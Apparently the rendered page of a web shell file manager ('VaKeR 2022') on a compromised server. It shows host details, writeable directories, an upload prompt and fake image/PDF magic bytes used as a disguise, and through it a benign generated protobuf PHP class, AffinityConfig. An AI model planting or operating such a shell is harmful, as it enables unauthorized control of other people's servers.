%PDF- %GIF98; %PNG; .
Cyber Programmer
Logo of a company Server : Apache
System : Linux host.digitalbabaji.in 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64
User : addictionfreeind ( 1003)
PHP Version : 7.2.34
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/addictionfreeind/www/admin1/vendor/google/grpc-gcp/src/generated/Grpc/Gcp/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/addictionfreeind/www/admin1/vendor/google/grpc-gcp/src/generated/Grpc/Gcp/AffinityConfig.php
<?php
# Generated by the protocol buffer compiler.  DO NOT EDIT!
# source: grpc_gcp.proto

namespace Grpc\Gcp;

use Google\Protobuf\Internal\GPBUtil;

/**
 * Generated from protobuf message <code>grpc.gcp.AffinityConfig</code>
 */
class AffinityConfig extends \Google\Protobuf\Internal\Message
{
    /**
     * The affinity command applies on the selected gRPC methods.
     *
     * Generated from protobuf field <code>.grpc.gcp.AffinityConfig.Command command = 2;</code>
     */
    private $command = 0;
    /**
     * The field path of the affinity key in the request/response message.
     * For example: "f.a", "f.b.d", etc.
     *
     * Generated from protobuf field <code>string affinity_key = 3;</code>
     */
    private $affinity_key = '';

    public function __construct()
    {
        \GPBMetadata\GrpcGcp::initOnce();
        parent::__construct();
    }

    /**
     * The affinity command applies on the selected gRPC methods.
     *
     * Generated from protobuf field <code>.grpc.gcp.AffinityConfig.Command command = 2;</code>
     * @return int
     */
    public function getCommand()
    {
        return $this->command;
    }

    /**
     * The affinity command applies on the selected gRPC methods.
     *
     * Generated from protobuf field <code>.grpc.gcp.AffinityConfig.Command command = 2;</code>
     * @param int $var
     * @return $this
     */
    public function setCommand($var)
    {
        GPBUtil::checkEnum($var, \Grpc\Gcp\AffinityConfig_Command::class);
        $this->command = $var;

        return $this;
    }

    /**
     * The field path of the affinity key in the request/response message.
     * For example: "f.a", "f.b.d", etc.
     *
     * Generated from protobuf field <code>string affinity_key = 3;</code>
     * @return string
     */
    public function getAffinityKey()
    {
        return $this->affinity_key;
    }

    /**
     * The field path of the affinity key in the request/response message.
     * For example: "f.a", "f.b.d", etc.
     *
     * Generated from protobuf field <code>string affinity_key = 3;</code>
     * @param string $var
     * @return $this
     */
    public function setAffinityKey($var)
    {
        GPBUtil::checkString($var, true);
        $this->affinity_key = $var;

        return $this;
    }
}

VaKeR 2022